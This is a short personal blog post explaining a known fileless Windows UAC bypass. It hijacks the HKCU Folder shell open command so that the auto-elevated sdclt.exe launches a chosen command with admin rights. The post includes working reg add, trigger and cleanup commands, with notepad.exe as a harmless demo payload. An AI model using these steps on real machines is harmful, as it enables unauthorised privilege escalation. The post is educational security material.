Noë Flatreaud

UAC Bypass via Sdclt.exe

A couple of days ago, I stomped around a clever UAC bypass technique that abuses sdclt.exe — a built-in Windows binary used for backup and restore operations. This method is fileless, relies on COM hijacking, and was originally documented by Matt Nelson here and there

How it works

Windows has a list of auto-elevated processes—executables that run with high integrity (admin rights) without triggering a UAC prompt and sdclt.exe is one of them.

You can verify this yourself with Sysinternals Sigcheck:

$ sigcheck.exe -m C:\Windows\System32\sdclt.exe | findstr autoElevate

If you see <autoElevate>true</autoElevate>, congratulations—you’ve found a potential UAC bypass candidate.

The COM Hijacking trick

When sdclt.exe runs from a medium-integrity process (like a normal user session), it :

  1. Spawns itself with high privileges (thanks, auto-elevation!).
  2. Calls control.exe (also high-integrity).
  3. Fails to find a default "open" command for the Folder object in the current user’s registry (HKCU).

This is where the magic happens:

Since medium-integrity users can write to HKCU, we can hijack the missing command and make control.exe run whatever we want — with admin rights.

Exploit

1. Set Up the Malicious Registry Key

We’ll modify the Folder\shell\open\command key to execute our payload (in this case, notepad.exe for demo purposes):

$ reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f
$ reg add "HKCU\Software\Classes\Folder\shell\open\command" /v "DelegateExecute" /f

2. Trigger the Bypass

Now, just run:

$ %windir%\system32\sdclt.exe

A voilà! Notepad pops up—running with high integrity (admin rights).

3. Clean Up

Don't be a jerk, always revert your changes after testing :

$ reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f

https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths
https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass